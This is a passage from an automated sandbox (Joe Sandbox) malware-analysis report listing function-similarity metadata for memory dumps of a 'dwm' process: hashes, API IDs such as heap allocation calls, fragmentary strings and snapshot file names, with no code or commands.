                        • Instruction ID: 3243659a9b159d7e16ea027822bec1d8889ca364bcfbab3cf3fea8797474cb1a
                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                        • Instruction Fuzzy Hash: 77112832615B8482EB618B29E848359B7E5FB88B98F594221EF8C07B6CDF3DC551CB40
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: __std_exception_copy
                        • String ID: ierarchy Descriptor'$riptor at (
                        • API String ID: 592178966-758928094
                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                        • Instruction ID: 6bbfd39685d2830decafeb26a3673bdb7252fceed1b09d9fc54d843661b06706
                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                        • Instruction Fuzzy Hash: FEE08671B50B4890DF018F61EC442E833F4DB59B68B999122995C06315FB38D1F9C300
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: __std_exception_copy
                        • String ID: Locator'$riptor at (
                        • API String ID: 592178966-4215709766
                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                        • Instruction ID: e73fd31c6e150cf26d920c1bc37515f6ba5b386a7fe5e69b554b71fd141b517e
                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                        • Instruction Fuzzy Hash: C2E08C71B10B4880DF028F61EC802E873B4EB6AB68F899122CA4C06319EB38D1E9C300
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID:
                        • API String ID: 756756679-0
                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                        • Instruction ID: 9901ef0c53ba639cf9c2774f52fea5f4f606d4c37f084e5de7fdaf40b5b30672
                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                        • Instruction Fuzzy Hash: B2118235B01B48C1EB44DF6AA80822973A1F789FC9F194126DE4D5776ADE39C442C380
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Heap$AllocProcess
                        • String ID:
                        • API String ID: 1617791916-0
                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                        • Instruction ID: 98bdc3652fe0f84a4e47298f21fa934a7790b4a66fd0bcd7e14f59bb28401e06
                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                        • Instruction Fuzzy Hash: D6E06D35B0160886EB048F66DC0C34A36E1FB99F0AF06C024CA890B356EF7E8499C790